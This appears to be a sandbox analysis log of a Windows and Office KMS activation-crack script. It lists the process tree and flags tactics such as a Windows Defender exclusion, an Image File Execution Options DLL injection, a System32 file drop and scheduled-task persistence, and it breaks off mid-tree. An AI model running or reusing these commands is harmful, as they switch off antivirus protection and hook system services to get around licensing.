C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4624
-
-
C:\Windows\system32\Wbem\WMIC.exe WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionPath="C:\Windows\Sysnative\SppExtComObjHook.dll" Force=True 3⤵ PID:1516
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:4608
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:1704
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:4996
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2960
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$d='C:\Windows\System32';$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':embdbin\:.*';iex ($f[1]);X 2"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2708 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Windows\Temp\raxki5h5\raxki5h5.cmdline"4⤵PID:400
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Windows\Temp\RESA2C.tmp" "c:\Windows\Temp\raxki5h5\CSC12A8482D1E54CE5BB92BF8DCDA9A990.TMP"5⤵PID:3280
-
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v Debugger3⤵PID:780
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2956
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierDebug /t REG_DWORD /d 0x00000000 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3444
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v VerifierFlags /t REG_DWORD /d 0x80000000 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4624
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v GlobalFlag /t REG_DWORD /d 0x00000100 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:5060
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_Emulation /t REG_DWORD /d 1 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2724
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 120 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3960
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 10080 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1676
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:980
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v Debugger3⤵PID:1560
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDlls /t REG_SZ /d "SppExtComObjHook.dll"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4704
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierDebug /t REG_DWORD /d 0x00000000 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3988
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v VerifierFlags /t REG_DWORD /d 0x80000000 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1300
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v GlobalFlag /t REG_DWORD /d 0x00000100 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:816
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_Emulation /t REG_DWORD /d 1 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2272
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 120 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:2636
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 10080 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4036
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:3280
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTaskLogon"3⤵PID:1648
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:3472
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "$f=[IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\active.bat') -split ':spptask\:.*'; [IO.File]::WriteAllText('SvcTrigger.xml',$f[1].Trim(),[System.Text.Encoding]::Unicode)"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4040
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger" /xml "C:\Windows\Temp\SvcTrigger.xml" /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3424
-
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "\Microsoft\Windows\SoftwareProtectionPlatform\SvcTrigger"3⤵PID:3868
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -c "&{$W=$Host.UI.RawUI.WindowSize;$B=$Host.UI.RawUI.BufferSize;$W.Height=31;$B.Height=300;$Host.UI.RawUI.WindowSize=$W;$Host.UI.RawUI.BufferSize=$B;}"3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1480
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\Software Protection Platform" /v NoGenTicket /t REG_DWORD /d 1 /f3⤵PID:4528
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:3592
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:4272
-
-
C:\Windows\system32\sc.exesc query sppsvc3⤵
- Launches sc.exe
PID:1872
-
-
C:\Windows\system32\find.exefind /i "STOPPED"3⤵PID:2240
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 120 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4388
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 10080 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:3004
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SppExtComObj.exe" /f /v KMS_HWID /t REG_QWORD /d "0x3A1C049600B60076"3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:1552
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_ActivationInterval /t REG_DWORD /d 120 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4964
-
-
C:\Windows\system32\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osppsvc.exe" /f /v KMS_RenewalInterval /t REG_DWORD /d 10080 3⤵
- Event Triggered Execution: Image File Execution Options Injection
PID:4684
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:3652
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\OfficeSoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:2636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c REG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k 2>nul | FIND /I "CurrentVersion"3⤵
- System Location Discovery: System Language Discovery
PID:688 -
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages" /f "Microsoft-Windows-*Edition~31bf3856ad364e35" /k4⤵PID:544
-
-
C:\Windows\system32\find.exeFIND /I "CurrentVersion"4⤵PID:3544
-
-
-
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.1288" /v "CurrentState"3⤵PID:1300
-
-
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:3228
-
-
C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ECHO Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.1288 3⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Windows\system32\reg.exeREG QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\Packages\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~10.0.19041.264" /v "CurrentState"3⤵PID:3620
-
-
C:\Windows\system32\find.exeFIND /I "0x70"3⤵PID:4920
-
-
C:\Windows\system32\net.exenet start sppsvc /y3⤵PID:2960
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start sppsvc /y4⤵PID:3360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3620 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' AND PartialProductKey is not NULL" get LicenseFamily /value4⤵PID:4612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3896 -
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName4⤵PID:2884
-
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:3544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3024 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:996
-
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4548
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath3⤵
- Modifies registry key
PID:2960
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\CVH /f Click2run /k3⤵
- Modifies registry key
PID:3984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2236 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:5064
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:4360 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\14.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:4844
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:2724 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:996
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3432 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1560 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:3984
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3868 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Common\InstallRoot /v Path4⤵
- Modifies registry key
PID:4684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- System Location Discovery: System Language Discovery
PID:2732 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:2884
-
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2236
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5108
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4996
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:844
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3920
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3988
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4548
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1516
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5084
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1560
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2760
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4684
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3620
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:980
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2732
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdXVolume" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4036
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"MondoRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:468
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProPlusRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4740
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:400
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4524
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2272
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2724
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4408
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5024
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2220
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3472
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3444
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3392
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3652
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3868
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:5064
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProfessionalRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2884
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeBusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4844
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"HomeStudentRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:4688
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365BusinessRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:3544
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365SmallBusPremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:1200
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365HomePremRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2320
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"O365EduCloudRetail" "C:\Windows\Temp\c2rchk.txt"3⤵PID:2736
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:2272
-
-
C:\Windows\system32\findstr.exe findstr 2019 3⤵ PID:3920
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4408
-
-
C:\Windows\system32\findstr.exe findstr 2021 3⤵ PID:3360
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:1452
-
-
C:\Windows\system32\findstr.exe findstr 2024 3⤵ PID:1080
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"3⤵PID:2140
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value3⤵PID:4484
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:3868
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value3⤵PID:980
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:4844
-
-
C:\Windows\system32\find.exefind /i "Office 14"3⤵PID:5108
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:844
-
-
C:\Windows\system32\find.exefind /i "Office 15"3⤵PID:400
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:2736
-
-
C:\Windows\system32\find.exefind /i "Office 16"3⤵PID:3988
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3920
-
-
C:\Windows\system32\find.exefind /i "Office 19"3⤵PID:1516
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:3360
-
-
C:\Windows\system32\find.exefind /i "Office 21"3⤵PID:1952
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:1648
-
-
C:\Windows\system32\find.exefind /i "Office 24"3⤵PID:5084
-
-
C:\Windows\system32\find.exefind /i "Office16ProPlusR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2052
-
-
C:\Windows\system32\find.exefind /i "Office16StandardR" "C:\Windows\Temp\sppchk.txt"3⤵PID:3392
-
-
C:\Windows\system32\find.exefind /i "Office16AccessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4684
-
-
C:\Windows\system32\find.exefind /i "Office16SkypeforBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2044
-
-
C:\Windows\system32\find.exefind /i "Office16ExcelR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2884
-
-
C:\Windows\system32\find.exefind /i "Office16OutlookR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4036
-
-
C:\Windows\system32\find.exefind /i "Office16PowerPointR" "C:\Windows\Temp\sppchk.txt"3⤵PID:3896
-
-
C:\Windows\system32\find.exefind /i "Office16PublisherR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4844
-
-
C:\Windows\system32\find.exefind /i "Office16WordR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2320
-
-
C:\Windows\system32\find.exefind /i "Office16ProfessionalR" "C:\Windows\Temp\sppchk.txt"3⤵PID:400
-
-
C:\Windows\system32\find.exefind /i "Office16HomeBusinessR" "C:\Windows\Temp\sppchk.txt"3⤵PID:2960
-
-
C:\Windows\system32\find.exefind /i "Office16HomeStudentR" "C:\Windows\Temp\sppchk.txt"3⤵PID:4408
-
-
C:\Windows\system32\find.exefind /i "Office16ProjectProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:1952
-
-
C:\Windows\system32\find.exefind /i "Office16ProjectStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:3444
-
-
C:\Windows\system32\find.exefind /i "Office16VisioProR" "C:\Windows\Temp\sppchk.txt"3⤵PID:5084
-
-
C:\Windows\system32\find.exefind /i "Office16VisioStdR" "C:\Windows\Temp\sppchk.txt"3⤵PID:1928
-
-
C:\Windows\system32\sc.exesc query ClickToRunSvc3⤵
- Launches sc.exe
PID:1560
-
-
C:\Windows\system32\sc.exesc query OfficeSvc3⤵
- Launches sc.exe
PID:3592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5064 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:4360
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:980 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:3896
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:780 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:2320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:400 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\WOW6432Node\Microsoft\Office\15.0\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:892
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1080 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:2140
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:5084 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v InstallPath4⤵
- Modifies registry key
PID:4856
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun /v PackageGUID" 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:1560 -
